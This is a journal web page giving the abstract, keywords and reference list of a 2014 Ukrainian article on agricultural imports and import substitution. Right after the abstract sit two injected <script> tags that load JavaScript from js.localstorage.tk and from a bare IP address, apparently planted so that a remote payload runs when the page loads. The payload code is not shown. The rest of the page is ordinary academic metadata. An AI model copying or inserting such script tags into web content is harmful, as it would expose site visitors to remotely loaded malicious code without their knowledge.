ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 338.43:339.562
Аграрна політика і реформування

Import of agricultural products in Ukraine and possibilities of substitution of it with domestic production / Kvasha S.M., Kryvenko N.V. // Ekonomika APK. - 2014. - № 5 - P. 11

Within the last decade the consumption of food and agricultural products by Ukrainian population as the whole has a total tendency to growth. Certain influence on the state food security has the growth of food imports. As result of the import volumes dynamics analysis there were defined groups of goods for which import dependence is enforced, production of these goods in Ukraine is impossible due to climatic conditions. At the same time, Ukraine has large import volumes of the certain groups of goods, the level of production of which, was sufficient for Ukraine within the previous years, but declined due to the lack of investments and competitiveness on the domestic food market. The study identifies such types of imported agricultural products and foods, provides their classification in accordance with capabilities of national production resumption and suggestes the ways for import substitution. Tabl.: 2. Fig.: 3. Refs.: 28.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: import, import substitution, export, foreign trade, agri-food products

References

 1. Сміт А. Дослідження про природу та причини добробуту націй / А. Сміт. – К.: Port-Royal, 2001. – 594 c.
 2. Рикардо Д. Сочинения. Т.1. Начала политической экономии и налогового обложения / Д. Рикардо. - М.: ОГИЗ Госполитиздат, 1941. – 388 с.
 3. Білорус О.Г. Глобальні трансформації торгівлі: моногр. / О.Г. Білорус, В.І. Власов. – К.: ННЦ ІАЕ, 2008. – 228 с.
 4. Економіка світового сільського господарства: підручник / В.П. Галушко, В.К. Береговий, В.І. Артиш та ін.; за ред. В.П. Галушка, В.К. Берегового. – К.: ЗАТ “Нічлава”, ТОВ ЦТІ “Енергетика та електрифікація”, 2011. – 1000 с.
 5. Бураковський І.В. Теорія міжнародної торгівлі / І.В. Бураковський. – К.: Основи, 1996. – 242 с.
 6. Губенко В.І. Теоретико-методологічні засади диверсифікації зовнішньоекономічної діяльності АПК як основний напрям переходу на інтенсивний шлях розвитку експорту / В.І. Губенко // АгроІнком. – 2006. – №5-6. – С.3-7.
 7. Зінчук Т.О. Європейська інтеграція: проблеми адаптації аграрного сектора економіки України: моногр. / Т.О.Зінчук. – Житомир: ДВНЗ “Держ. агроекол. ун-т”, 2008. – 384 с.
 8. Глобальні трансформації і стратегії розвитку: моногр. / О.Г. Білорус, Д.Г. Лук’яненко, О.М. Гончаренко та ін.- К.: КНЕУ, 1998. – 416 с.
 9. Осташко Т.О. Внутрішній агропродовольчий ринок України в умовах СОТ / Т.О. Осташко, Л.Ю. Волощенко, Г.В. Лєнівова; відп. ред. В.О. Точилін; НАН України; Ін-т екон. та прогнозув. – К., 2010. – 208 с.
 10. Рут, Франклін Р. Міжнародна торгівля та інвестиції: пер.з англ. із змінами та допов. / Ф. Р. Рут, А. Філіпенко. – К.: Основи, 1998. – 744 с.
 11. Шнирков О.І. Європейський Союз у глобальному інноваційному просторі: моногр. / О.І. Шнирков. – К.: Видавничо-поліграфічний центр “Київський університет”, 2008. – 144 с.
 12. Paul A. Samuelson Economics: An Introductory Analysis. Seventh Edition. – New York, 1967. – 821 p.
 13. Aderson K., Y. Hayami The Political Economy of Agricultural Protection: East Asia in International Perspective / K. Aderson, Y. Hayami and other - Sydney, London, Boston, 1986. – 185 p.
 14. Ben-David D. Trade, Income Disparity and Poverty // Ben-David D., Nordstrom H., Winters L.F./ Geneva : WTO, 2000. – 70 p.
 15. Robert L. Heilbroner The economic problem . Revised 8th edition. – USA: NY, 1978. – 737 p.
 16. Warzykowsky P. Food demand in the EU under condition of economic slowdown / P. Warzykowsky // Економіка АПК. – 2014. – №1. – P.99-106.
 17. Драганова Т. Імпортозаміщення як фактор економічного зростання України. [Електронний ресурс] / Т. Драганова, С. Сідлярчук – Режим доступу: http://sophus. at.ua/publ/2011_11_15_16_kampodilsk/ section_3_2011_11_15_16/importozamishhennja_jak_faktor_ekonomichnogo_zrostannja_ukrajini/5-1-0-7.
 18. Біленко В.О. Заміщення імпорту стимулювання експорту: погляд економічної теорії [Електронний ресурс]/ В.О. Біленко, Ю.М. Петрусенко. – Режим доступу: http://essuir.sumdu.edu.ua/bitstream/ 123456789/31060/1/ Bilenko_Import.pdf.
 19. Самусева Л.А. Генезис теории импортозамещения / [Електронний ресурс] / Л.А.Самусева, Е.Н. Петрушкова. – http://www.rusnauka. com/12_KPSN_2012/Economics/16_108769.doc.htm.
 20. Пахомов Ю.М. Національні економіки в глобальному конкурентному середовищі: моногр. / Ю.М. Пахомов, Д.Г. Лук’яненко, Б.В. Губський – К.: Вид-во “Україна”, 1997. – 237 с.
 21. Линдерт П. Экономика мирохозяйственных связей / П. Линдерт; пер. с англ.; общ. ред. и предисл. О.В.Ивановой. – М.: Прогресс, 1992. – 520 с.
 22. Портер М. Международная конкуренция / М. Портер; пер. с англ.; под ред. и предисл. В.Д. Щетинина. – М.: Международные отношения, 1993. – 896 с.
 23. Тутов С. Украина: путь из кризиса на внутренний рынок [Электронный ресурс] / С. Тутов – Режим доступа: http:// rakurs. ua/337- ukraina- put- iz- krizisa- na vnytrenniy-rynok – Заголовок с экрана.
 24. Кругман П.Р. Международная экономика/ П.Р. Кругман. – М. Обстфельдт: 5-е изд. – СПб. : Питер, 2003. – 832 с.
 25. Шпичак О.М. Проблеми ємності внутрішнього споживчого ринку сільськогосподарської продукції та продовольства в Україні у контексті купівельної спроможності населення / О.М. Шпичак, О.В. Боднар // Економіка АПК. – 2013. - №6. – С.5-13.
 26. Основні завдання Державної програми активізації розвитку економіки на 2013-2014 роки (у розрізі регіонів України). – К. : МінАПП, 2013. – 70 с.
 27. Експорт та імпорт продукції аграрного сектору України: стан та тенденції / [Кваша С.М., Власов В.І., Кривенко Н.В. та ін.]; за ред. С.М. Кваші. – К.: ННЦ ІАЕ, 2013. – 80 с.
Read article: 14_05_11-21.pdf